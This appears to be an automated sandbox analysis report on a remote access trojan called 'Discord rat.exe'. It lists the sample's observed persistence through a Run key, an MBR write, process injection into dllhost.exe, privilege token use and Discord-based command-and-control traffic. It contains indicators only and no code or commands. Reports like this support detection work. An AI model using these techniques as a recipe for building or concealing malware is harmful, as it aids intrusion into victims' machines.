discordrat | 5436af4185d5c05d8ec07213f940cb8a3506fa9a0621b45ebf38583e37165977

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p"	WaaSMedicAgent.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Discord rat.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Discord rat.exe"	Discord rat.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 44 IoCs

Web Service

T1102

flow	ioc
117	discord.com
124	discord.com
22	discord.com
93	discord.com
95	discord.com
103	discord.com
113	discord.com
9	raw.githubusercontent.com
27	discord.com
129	discord.com
10	raw.githubusercontent.com
97	discord.com
102	discord.com
105	discord.com
114	discord.com
118	discord.com
94	discord.com
101	discord.com
109	discord.com
122	discord.com
131	discord.com
127	discord.com
21	discord.com
96	discord.com
98	discord.com
107	discord.com
112	discord.com
115	discord.com
125	discord.com
90	discord.com
104	discord.com
110	discord.com
120	discord.com
123	discord.com
121	discord.com
37	discord.com
92	discord.com
100	discord.com
106	discord.com
108	discord.com
111	discord.com
116	discord.com
126	discord.com
128	discord.com

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	wmiprvse.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe

Suspicious use of SetThreadContext 21 IoCs

description	pid	Process	procid_target
PID 3544 set thread context of 3216	3544	Discord rat.exe	85
PID 3544 set thread context of 1972	3544	Discord rat.exe	92
PID 3544 set thread context of 912	3544	Discord rat.exe	98
PID 3544 set thread context of 452	3544	Discord rat.exe	106
PID 3544 set thread context of 4340	3544	Discord rat.exe	113
PID 3544 set thread context of 4580	3544	Discord rat.exe	117
PID 3544 set thread context of 1068	3544	Discord rat.exe	127
PID 3544 set thread context of 4624	3544	Discord rat.exe	134
PID 3544 set thread context of 5660	3544	Discord rat.exe	141
PID 3544 set thread context of 5992	3544	Discord rat.exe	150
PID 3544 set thread context of 2908	3544	Discord rat.exe	157
PID 3544 set thread context of 6020	3544	Discord rat.exe	166
PID 3544 set thread context of 3968	3544	Discord rat.exe	173
PID 3544 set thread context of 5320	3544	Discord rat.exe	180
PID 3544 set thread context of 6004	3544	Discord rat.exe	187
PID 3544 set thread context of 5348	3544	Discord rat.exe	195
PID 3544 set thread context of 5824	3544	Discord rat.exe	202
PID 3544 set thread context of 5352	3544	Discord rat.exe	209
PID 3544 set thread context of 948	3544	Discord rat.exe	218
PID 3544 set thread context of 5560	3544	Discord rat.exe	225
PID 3544 set thread context of 2824	3544	Discord rat.exe	232

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File created	C:\Windows\Logs\CBS\CBS.log	TrustedInstaller.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TrustedInstaller.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 63 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	NetSh.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe

Modifies data under HKEY_USERS 56 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000f0af421aea2a774ba31c2a237022df5b000000000200000000001066000000010000200000009b5aaaf4c2699e04b6104c3323c13e28a1d625be0326e75eca49789c3b638e90000000000e8000000002000020000000d2f6e7dcedf42008588ed71503ba8802b217e10b6a23fa997525a39c6e3e45b1b0030000b34bf029e9251e039e5ccb194cc41a942adfcf2471cdcb7b68f43257af60c39da7373189565816927df33b925a6d3b7e79f95b3838cfccdacd68e7cf96612d87d73323191a46c583670e56528ff365aa1ef328cbff0b98dbd57bd14c77d33cb9a0535418deb6b4b39355563cbf9f5ab5ff1a0410188dc9cbb31d5b18318cd880ff7b5ae4d192471f824b8653d31bc84950d99e8c09e94eac815f5ce7a10cbe311d2006abe665e4bf936544024bdb50ab382079e39bd7fefa5378c0c87c83472951de4c739fc0ee314b6f03decd240feadf557bd025e134495e692d0b873e74d6a3766f4c43b959689f7bb392877e96a2e78559574fbdffb586d8b18309c132d9ad7235572f8294867796f5ea977dada078d2ac1ea589e13f236c4be4168347495760f412e4e1bdaf77f6475323b63a9407fb5bc19eec977304c06f551395d579eb828f4e506941851a0f5fd1b97acdbf512d044c4d673bf868caff6f469b29b6a40758c5b779d3df49db31dd1f207906f7e13449407e45e617f47dcd327184f447ece351028d07baf7a8ca65d3b607bc1014d99ed65fe9f1d6036a283144492520f9ee825d166b2c3bf6b8b3b40b80a9ed9e52f4c1e952c6c0dc4d5f4fd65600fa60b4dd26d8d2d50570c0a0b5ea8fde3497c8e217d89c8788f428d347ececec5adb20125981b169dfcf9d5306d7a0dc22e665edebc8c54aecb28ef1394c1a2ced343b5222d66509338761617a42dfbebe7b0040d2fbf1972235290be744f15a154b76db742e4a3cbe5b13680ec180aef4fae10cd388f8607d32f0a874fd0c51c25de7c150ee2d154099083a2d5396959d0e2092f736bd6df6c00ae16bd48914c0254dc463ebb591f1715eddd03081917bd9c12d1ed14d70d49df72a7111f18c31c790e24607fb06ec9c3e2a482f64bfcfdfddc4fb4a852c633e08150e0ed45e7521216d4cefc63e62078491eed1bbda6dc2105dc1acb263346e9dd924f00114ce1c5ff9b4844811954feaeaec4ba0eef2d4831a23cfc257268a562fef65c2bbc0ba7eadcc513538cb07e2ecf2a45b80f1e9fdfb901881f1a06c94bad0757d24e0659fb9c3d2742da9e591bc2249a78993eaa4b7950e072807ce101384da54168010171fa860992b1545948c3da16664bda952d0ed4439b4338818555e4d312505a31d205886c055a9b93bb6e6969a0cbe1238395abc169c658944dab44db827cc1affb4488ec6b125caf12755cc7f1fa6fef2d54e5f817476eff07f4a43671442653df3a666bab1940916897026d99e253de4a37fc745ee92e015b995213759c048beb8fce062e50639f7aadc98607a4000000081e3f598d35ce48e5f0482f9950642b4d81099e838ff88a2d108d4a261a88580a4fd67179d8b3aa6d399c911f574953cc811bd035564259a31b998b637ad06ae	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "001800108A6A1C65"	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\001800108A6A1C65 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000f0af421aea2a774ba31c2a237022df5b000000000200000000001066000000010000200000005747f94e370b44160bff11d9a25e18818b2cc073921ec43ab428f0780c20042b000000000e8000000002000020000000de4b037168e8ee5fceea0823340038bbead15cda163f4c39c965008f56505779800000009077e18388bc6f7a04ff1d0db0a245d62a513f8369c65e344a3d0a2ae2fcf258989c7cb40013af5d27332b5632e3954c7bfdc689c0a8339e865f340a572a575989c7d5d986379b9b2f5b10b68621bb08dfd968d5e8ab83173041b2b2f6e6b400eb383d9e089460968298295327f55d50ab6baff4a6749c22ee73778626c0b9e740000000694f2b88ffc2cc417c01c92680e722444b672e4e3abae8c94bef01b0dc43d85c1d12bdf055c691f06fbaee7e8e3f8333d060c6da5ca51e5e308252dc7a6d69d5	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "001800108A6A1C65"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}	mousocoreworker.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1"	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property	mousocoreworker.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3544	Discord rat.exe
3216	dllhost.exe
3216	dllhost.exe
1344	powershell.exe
3544	Discord rat.exe
1972	dllhost.exe
1972	dllhost.exe
3544	Discord rat.exe
912	dllhost.exe
912	dllhost.exe
3544	Discord rat.exe
3544	Discord rat.exe
452	dllhost.exe
452	dllhost.exe
1344	powershell.exe
1344	powershell.exe
912	dllhost.exe
912	dllhost.exe
3544	Discord rat.exe
3544	Discord rat.exe
4340	dllhost.exe
4340	dllhost.exe
3544	Discord rat.exe
4580	dllhost.exe
4580	dllhost.exe
4396	powershell.exe
4396	powershell.exe
948	powershell.exe
948	powershell.exe
912	dllhost.exe
912	dllhost.exe
1344	powershell.exe
912	dllhost.exe
912	dllhost.exe
912	dllhost.exe
912	dllhost.exe
1340	powershell.exe
1340	powershell.exe
948	powershell.exe
4484	powershell.exe
4484	powershell.exe
912	dllhost.exe
912	dllhost.exe
4396	powershell.exe
2252	powershell.exe
2252	powershell.exe
912	dllhost.exe
912	dllhost.exe
4396	powershell.exe
912	dllhost.exe
912	dllhost.exe
4340	dllhost.exe
4340	dllhost.exe
3544	Discord rat.exe
3544	Discord rat.exe
1068	dllhost.exe
1068	dllhost.exe
4340	dllhost.exe
4340	dllhost.exe
3544	Discord rat.exe
1340	powershell.exe
948	powershell.exe
4624	dllhost.exe
4624	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	3216	dllhost.exe
Token: SeDebugPrivilege	1344	powershell.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	1972	dllhost.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	912	dllhost.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	452	dllhost.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	948	powershell.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	4340	dllhost.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	4580	dllhost.exe
Token: SeDebugPrivilege	4396	powershell.exe
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeDebugPrivilege	4484	powershell.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	1068	dllhost.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	4624	dllhost.exe
Token: SeDebugPrivilege	4044	powershell.exe
Token: SeDebugPrivilege	5104	powershell.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	5660	dllhost.exe
Token: SeDebugPrivilege	5716	powershell.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	5992	dllhost.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	3544	Discord rat.exe
Token: SeDebugPrivilege	2908	dllhost.exe
Token: SeDebugPrivilege	3272	powershell.exe
Token: SeDebugPrivilege	6140	powershell.exe
Token: SeShutdownPrivilege	5988	svchost.exe
Token: SeCreatePagefilePrivilege	5988	svchost.exe
Token: SeShutdownPrivilege	5988	svchost.exe
Token: SeCreatePagefilePrivilege	5988	svchost.exe
Token: SeShutdownPrivilege	5988	svchost.exe
Token: SeCreatePagefilePrivilege	5988	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2176	svchost.exe
Token: SeIncreaseQuotaPrivilege	2176	svchost.exe
Token: SeSecurityPrivilege	2176	svchost.exe
Token: SeTakeOwnershipPrivilege	2176	svchost.exe
Token: SeLoadDriverPrivilege	2176	svchost.exe
Token: SeBackupPrivilege	2176	svchost.exe
Token: SeRestorePrivilege	2176	svchost.exe
Token: SeShutdownPrivilege	2176	svchost.exe
Token: SeSystemEnvironmentPrivilege	2176	svchost.exe
Token: SeManageVolumePrivilege	2176	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2176	svchost.exe
Token: SeIncreaseQuotaPrivilege	2176	svchost.exe
Token: SeSecurityPrivilege	2176	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3544 wrote to memory of 3216	3544	Discord rat.exe	85
PID 3544 wrote to memory of 3216	3544	Discord rat.exe	85
PID 3544 wrote to memory of 3216	3544	Discord rat.exe	85
PID 3544 wrote to memory of 3216	3544	Discord rat.exe	85
PID 3544 wrote to memory of 3216	3544	Discord rat.exe	85
PID 3544 wrote to memory of 3216	3544	Discord rat.exe	85
PID 3544 wrote to memory of 3216	3544	Discord rat.exe	85
PID 3544 wrote to memory of 3216	3544	Discord rat.exe	85
